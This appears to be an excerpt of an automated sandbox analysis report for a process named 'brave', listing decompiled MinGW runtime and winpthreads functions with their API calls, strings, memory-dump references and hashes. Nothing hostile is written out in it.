0x7ff715ba563a
0x7ff715ba5643
0x7ff715ba5645
0x7ff715ba564b
0x7ff715ba5657
0x7ff715ba565c
0x7ff715ba5661
0x7ff715ba5667
0x7ff715ba566e
0x7ff715ba5677
0x7ff715ba5682
0x7ff715ba5688
0x7ff715ba5692
0x7ff715ba569a
0x7ff715ba56a3
0x7ff715ba56ac
0x7ff715ba56b1
0x7ff715ba56b7
0x7ff715ba56be
0x7ff715ba56c4
0x7ff715ba56d0
0x7ff715ba56d4
0x7ff715ba56d6
0x7ff715ba56de
0x7ff715ba56e6
0x7ff715ba56eb
0x7ff715ba56ed
0x7ff715ba56f2
0x7ff715ba56f4
0x7ff715ba56fe
0x7ff715ba5703
0x7ff715ba5705
0x7ff715ba5710
0x7ff715ba5715
0x7ff715ba571c
0x7ff715ba5722
0x7ff715ba5729
0x7ff715ba5732
0x7ff715ba573d
0x7ff715ba573f
0x7ff715ba5747
0x7ff715ba574e
0x7ff715ba5757

APIs

Part of subcall function 00007FF715BA2D40: TlsGetValue.KERNEL32 ref: 00007FF715BA2DA0

TlsGetValue.KERNEL32 ref: 00007FF715BA55B9
CloseHandle.KERNEL32 ref: 00007FF715BA55E5
_endthreadex.MSVCRT ref: 00007FF715BA5603
longjmp.MSVCRT ref: 00007FF715BA5634
CloseHandle.KERNEL32 ref: 00007FF715BA5645
TlsSetValue.KERNEL32 ref: 00007FF715BA5682
CloseHandle.KERNEL32 ref: 00007FF715BA569A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction ID: 6035811f2ca9b1a2ef00afa58dfb6ffbe21daf0bfe22b49f7e025b2e3093dd66
Opcode Fuzzy Hash: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction Fuzzy Hash: 94510521A19F0681EEBAAB25D454379A2A4FF84F68F855035DA0D073F1DF3CA54CC321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA78B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA78B0(void* __edx, intOrPtr* __rcx) {
				intOrPtr _t19;
				intOrPtr _t23;
				void* _t28;
				intOrPtr* _t29;

				_t29 =  *0x15e46920; // 0x7ff715e51400
				_t19 =  *_t29;
				r12d = __edx;
				if (_t19 == 0) goto 0x15ba7948;
				if ( *((long long*)(_t19 + 0xa0)) != 0) goto 0x15ba7968;
				 *((long long*)(_t19 + 0xa0)) = 0x15e42be8;
				E00007FF77FF715BA8830(0x15e42be8, _t28);
				if ( *((intOrPtr*)( *__rcx)) != 0xbab1f0ed) goto 0x15ba79a9;
				if ( *((intOrPtr*)( *__rcx + 4)) <= 0) goto 0x15ba79a9;
				 *((intOrPtr*)( *__rcx + 4)) =  *((intOrPtr*)( *__rcx + 4)) - 1;
				_t23 =  *_t29;
				if (_t23 == 0) goto 0x15ba7978;
				if ( *((long long*)(_t23 + 0xa0)) != 0) goto 0x15ba79a0;
				 *((long long*)(_t23 + 0xa0)) = 0x15e42be8;
				E00007FF77FF715BA8870(0x15e42be8);
				return r12d;
			}

0x7ff715ba78b8
0x7ff715ba78bf
0x7ff715ba78c5
0x7ff715ba78cb
0x7ff715ba78d5
0x7ff715ba78e2
0x7ff715ba78e9
0x7ff715ba78f7
0x7ff715ba7905
0x7ff715ba790e
0x7ff715ba7912
0x7ff715ba7918
0x7ff715ba7922
0x7ff715ba792b
0x7ff715ba7932
0x7ff715ba7942

Strings

., xrefs: 00007FF715BA79B4
C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF715BA79BC
Assertion failed: (%s), file %s, line %d, xrefs: 00007FF715BA79CD
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF715BA79C3

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
API String ID: 0-3957588491
Opcode ID: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction ID: 8aa1bd1455c4372de75e43eac5f4b7dd9118fc86bdc25248d6e07bda460e171e
Opcode Fuzzy Hash: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction Fuzzy Hash: 21311932A09E4A95EA39AB15D4103B9A7A0FB45F64FC44136DA4E473A1DF3CE449C722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9F130 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00007FF77FF715B9F130(void* __ecx, void* __eflags, char* __rax, long long __rdx, void* __r8) {
				intOrPtr _t7;
				void* _t12;
				long long _t23;
				int _t24;
				struct _CRITICAL_SECTION* _t33;
				struct _CRITICAL_SECTION* _t36;

				asm("lodsb");
				if (__eflags > 0) goto 0x15b9f15d;
				 *((intOrPtr*)(__rax - 0x77)) =  *((intOrPtr*)(__rax - 0x77)) + __ecx;
				asm("sbb eax, 0x2b2065");
				if ( *__rax != 0) goto 0x15b9f016;
				E00007FF77FF715BB1B50(_t12, 0x7ff715b9ef50);
				goto 0x15b9f016;
				asm("o16 nop [cs:eax+eax]");
				_t7 =  *0x15e511b0; // 0x0
				if (_t7 == 0) goto 0x15b9f200;
				if (__r8 == 0) goto 0x15b9f1a5;
				if (__r8 == 0x15e511a0) goto 0x15b9f1a5;
				r8d = 0x2b;
				0x15bb1790();
				calloc(_t24);
				if (0x15e511a0 == 0) goto 0x15b9f200;
				 *0x15e511a0 = 0x7ff715b9ef50;
				 *0x7FF715E511A8 = __rdx;
				EnterCriticalSection(_t36);
				_t23 =  *0x15e511a8; // 0x0
				 *0x15e511a8 = 0x15e511a0;
				 *0x7FF715E511B0 = _t23;
				LeaveCriticalSection(_t33);
				return 0;
			}

0x7ff715b9f130
0x7ff715b9f131
0x7ff715b9f133
0x7ff715b9f136
0x7ff715b9f13e
0x7ff715b9f14b
0x7ff715b9f150
0x7ff715b9f155
0x7ff715b9f167
0x7ff715b9f175
0x7ff715b9f17e
0x7ff715b9f18a
0x7ff715b9f18c
0x7ff715b9f1a0
0x7ff715b9f1af
0x7ff715b9f1ba
0x7ff715b9f1bc
0x7ff715b9f1c6
0x7ff715b9f1ca
0x7ff715b9f1d0
0x7ff715b9f1de
0x7ff715b9f1e5
0x7ff715b9f1e9
0x7ff715b9f1f8

APIs

_assert.MSVCRT ref: 00007FF715B9F1A0
calloc.MSVCRT ref: 00007FF715B9F1AF
EnterCriticalSection.KERNEL32 ref: 00007FF715B9F1CA
LeaveCriticalSection.KERNEL32 ref: 00007FF715B9F1E9

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF715B9F192
!dso || dso == &__dso_handle, xrefs: 00007FF715B9F199

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave_assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 4191840866-4180103562
Opcode ID: 89d225980ee264ff5e357f890741bd0a0885e460cb129bedeac4b07323f812ca
Instruction ID: 3f74ac4df40ddf1cd56e673a2f055f1c75739ec6bfc6e6d4d7aacfeb6fbcd1a4
Opcode Fuzzy Hash: 89d225980ee264ff5e357f890741bd0a0885e460cb129bedeac4b07323f812ca
Instruction Fuzzy Hash: FA2130A6E1DB4255F72ABB10FA402A5A6A4AF44BB0FC90071C55C472B1DF2CE58DC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA9F30 Relevance: 10.5, APIs: 7, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA9F30(void* __edx, void* __rcx, void* __r8) {

				r12d = __edx;
				if (__r8 == 0) goto 0x15ba9fa1;
				if (__rcx != 0) goto 0x15ba9f60;
				if (r12d != 0) goto 0x15ba9f8d;
				return r12d;
			}

0x7ff715ba9f3a
0x7ff715ba9f40
0x7ff715ba9f45
0x7ff715ba9f4a
0x7ff715ba9f56

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF715BA9F60
OpenProcess.KERNEL32 ref: 00007FF715BA9F77
CloseHandle.KERNEL32 ref: 00007FF715BA9F85
_errno.MSVCRT ref: 00007FF715BA9FA1

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen_errno
String ID:
API String ID: 2250453136-0
Opcode ID: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
Instruction ID: 0417581a94a2836e1820634ea93e15c5cc241f2dadb16bf63d6a579ca36929ee
Opcode Fuzzy Hash: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
Instruction Fuzzy Hash: 4701612AD1DE0786EA7E6F615984239A1A1AF44F75FD45634EA1A092F0DF3D344CE330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA8980 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF715BA89A0
fprintf.MSVCRT ref: 00007FF715BA89BF
GetCurrentThreadId.KERNEL32 ref: 00007FF715BA89D5
fprintf.MSVCRT ref: 00007FF715BA89FC

Strings

C%p %d V=%0X w=%ld %s, xrefs: 00007FF715BA89E3
C%p %d %s, xrefs: 00007FF715BA89AE

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
API String ID: 1384477639-884133013
Opcode ID: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction ID: 2b37599f933bff46c70ba73de788d32e04c200e1df70d83ba1d40333b51d84aa
Opcode Fuzzy Hash: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction Fuzzy Hash: 84018476E18B0585E625AF25E84056AB764BB44FE8F888131ED8D47760EF3CE54DC710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9F160 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF715B9F1A0
calloc.MSVCRT ref: 00007FF715B9F1AF
EnterCriticalSection.KERNEL32 ref: 00007FF715B9F1CA
LeaveCriticalSection.KERNEL32 ref: 00007FF715B9F1E9

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF715B9F192
!dso || dso == &__dso_handle, xrefs: 00007FF715B9F199

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave_assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 4191840866-4180103562
Opcode ID: f75f473cc27cf5f1c1fc51378073b3bce385c5a3abcb57c2d3be634da1e2c61d
Instruction ID: fe5ae1ba0c499490a68a1d90e91a0d014a809dcdd5d3a6bd1741c5ee7a15facd
Opcode Fuzzy Hash: f75f473cc27cf5f1c1fc51378073b3bce385c5a3abcb57c2d3be634da1e2c61d
Instruction Fuzzy Hash: 06011B68E28F0655FB2DAB51EA441B6A2A4AF44FB0FC44030D95C4B3B0DF2CE58DC360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9CDF0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9CDF0(void* __rax, void* __rcx, intOrPtr* __r8) {
				intOrPtr _t13;
				signed char _t14;
				signed long long _t41;

				if (__r8 == 0) goto 0x15b9ce93;
				r13d = 1;
				goto 0x15b9ce89;
				if ( *((intOrPtr*)(__r8 + 0x10)) != 0) goto 0x15b9ce81;
				_t13 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 8))));
				if (r9d != 0) goto 0x15b9ce45;
				_t14 = __rax - 0x1c;
				if (_t14 - 0x34 > 0) goto 0x15b9ce45;
				if ((_t41 << _t14 & 0x0000001f) != 0) goto 0x15b9ce81;
				 *((intOrPtr*)(__r8 + 0x10)) = 1;
				 *((long long*)(__rcx + 0x120)) =  *((intOrPtr*)(__r8 + 0x18));
				if (_t13 == 0x29) goto 0x15b9cea0;
				if (_t13 == 0x2a) goto 0x15b9cec4;
				if (_t13 == 2) goto 0x15b9cee8;
				E00007FF77FF715B9C080();
				if ( *__r8 == 0) goto 0x15b9ce93;
				if ( *((intOrPtr*)(__rcx + 0x130)) == 0) goto 0x15b9ce20;
				return _t13;
			}

0x7ff715b9ce08
0x7ff715b9ce18
0x7ff715b9ce1e
0x7ff715b9ce25
0x7ff715b9ce2b
0x7ff715b9ce30
0x7ff715b9ce32
0x7ff715b9ce38
0x7ff715b9ce43
0x7ff715b9ce49
0x7ff715b9ce57
0x7ff715b9ce61
0x7ff715b9ce66
0x7ff715b9ce6b
0x7ff715b9ce75
0x7ff715b9ce87
0x7ff715b9ce91
0x7ff715b9ce9f

Strings

{, xrefs: 00007FF715B9CFF2
}, xrefs: 00007FF715B9D0F0
:, xrefs: 00007FF715B9CF06
default arg#, xrefs: 00007FF715B9CFEB
}::, xrefs: 00007FF715B9D0E9

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: :$default arg#${$}$}::
API String ID: 0-1396675520
Opcode ID: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction ID: 6e12e6c0de3c0e74d9aa6edd16ea8d77148002fa2b01bb9042ede1f4f4ce8dd9
Opcode Fuzzy Hash: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction Fuzzy Hash: 5991C9B2A08A8187E77D9B25E4003FEA751EB05BA4F984035CF9A07795DF7DE489D310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9F6C0 Relevance: 9.0, APIs: 6, Instructions: 35
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9F6C0(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0x15b9f6e0;
				return _t1;
			}

0x7ff715b9f6ca
0x7ff715b9f6d2
0x7ff715b9f6db

APIs

GetLastError.KERNEL32 ref: 00007FF715B9F6CA
FormatMessageA.KERNEL32 ref: 00007FF715B9F70B
IsDebuggerPresent.KERNEL32 ref: 00007FF715B9F715

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID:
API String ID: 2392558662-0
Opcode ID: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction ID: 1b426c53f0304661af767099dd581964fa58439a1fa6ea33515d58b9e73bcdef
Opcode Fuzzy Hash: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction Fuzzy Hash: ED016265E18E4281E779AB15BC5432AA271BB84FA4F940034EA8D86674EF3DD44CC720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA7A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF715BA7A70
GetCurrentThreadId.KERNEL32 ref: 00007FF715BA7A9D
printf.MSVCRT ref: 00007FF715BA7AD5

Strings

RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s, xrefs: 00007FF715BA7AAB
RWL%p %d %s, xrefs: 00007FF715BA7A7C

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CurrentThread$printf
String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
API String ID: 2165381015-1971217749
Opcode ID: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction ID: 3a0039af2b3b20e5fbcde54eda1c1a0fc318c13e0356a10536d509954783f009
Opcode Fuzzy Hash: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction Fuzzy Hash: D6018036A18E4586E735AF15E84076AB7A0AB84FE8F484030EE4D87764EF3CD54D8B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA8E10 Relevance: 7.7, APIs: 5, Instructions: 186
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF77FF715BA8E10(void* __edx, long long __rax, long long __rcx, void* __r9) {
				long long _v48;
				char _v56;
				void* _t6;
				void* _t9;
				void* _t17;
				long long _t25;

				_t25 = __rax;
				r12d = r8d;
				if (__edx == 1) goto 0x15ba8e90;
				_v56 = __rcx;
				E00007FF77FF715BA5420(__rax);
				_v48 = _t25;
				if (_t25 == 0) goto 0x15ba8f20;
				r8d = 0;
				r9d = r12d;
				_t6 = E00007FF77FF715BA7560(2, _t25,  &_v56, __r9);
				_t17 = _t6 - 0x80;
				if (_t17 == 0) goto 0x15ba9080;
				if (_t17 > 0) goto 0x15ba8ed8;
				if (_t6 == 0) goto 0x15ba8ec0;
				if (_t6 != 1) goto 0x15ba9040;
				ResetEvent(??);
				if (__edx != 2) goto 0x15ba90c9;
				E00007FF77FF715BA58E0(2, _t25,  &_v56);
				goto 0x15ba8e45;
				_t9 = E00007FF77FF715BA74C0(r8d, _t25, _v48,  &_v56);
				if (_t9 == 0x80) goto 0x15ba905d;
				if (_t9 == 0x102) goto 0x15ba9058;
				r12d = 0x16;
				if (_t9 != 0) goto 0x15ba8ec3;
				r12d = 0;
				return r12d;
			}

0x7ff715ba8e10
0x7ff715ba8e20
0x7ff715ba8e26
0x7ff715ba8e28
0x7ff715ba8e32
0x7ff715ba8e37
0x7ff715ba8e3f
0x7ff715ba8e45
0x7ff715ba8e48
0x7ff715ba8e53
0x7ff715ba8e58
